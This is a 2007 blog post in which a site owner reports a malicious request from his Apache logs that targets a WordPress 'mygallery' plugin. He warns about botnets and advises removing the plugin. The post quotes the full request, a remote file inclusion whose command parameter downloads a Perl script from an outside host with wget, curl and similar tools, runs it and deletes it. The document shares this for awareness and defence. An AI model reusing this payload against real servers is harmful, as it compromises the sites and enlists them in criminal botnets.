WordPress Exploit Appearing in Apache Logs

Written by James McDonald

July 8, 2007

This appeared in my Apache logs this morning:

//wp-content/plugins/mygallery/myfunctions ... rm%20-rf%20kk*?: 1 Time(s)

Looking back through the logs the full request was:
//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=
http://koeh.t35.com/ptjz/root.gif?
&cmd=cd%20/tmp;lwp-download%20http://tw0team.name/leto/kk.txt;wget%20
http://tw0team.name/leto/kk.txt;fetch%20http://tw0team.name/leto/kk.txt;curl%20-O%20
http://tw0team.name/leto/kk.txt;perl%20kk.txt;rm%20-rf%20kk*?
HTTP/1.1" 404 11561 "-" "libwww-perl/5.803"

As can be seen from the request it is supposed to download a heap of stuff from multiple sources.

I have been looking at what are known as botnet’s, a contraction of roBOT NETworks. Literally thousands of computers exploited to be used by criminal gangs for SPAM and DDOS attacks.

There is a US Gov website, I can’t find the link at the moment. Which says that there are over a million compromised computers in use by various criminal organizations.

So if you have a internet connected computer you may find you are subject to these attacks whether you know about it or not.. There are many websites that tell you how to secure your computer.

Doing nothing is a good way of giving someone the contents of your online bank accounts.

My advice for wordpress users if you have a plugin mygallery check the security information at wordpress.org and if you can’t find anything about a fix or patch remove it immediately.

1 Comment

  1. Sofie

    It seems not only to be a WP exploid but the backdoor also distributes itself on IRC networks (Internet Relay Chat).

    Reply

Submit a Comment

Your email address will not be published. Required fields are marked *

You May Also Like…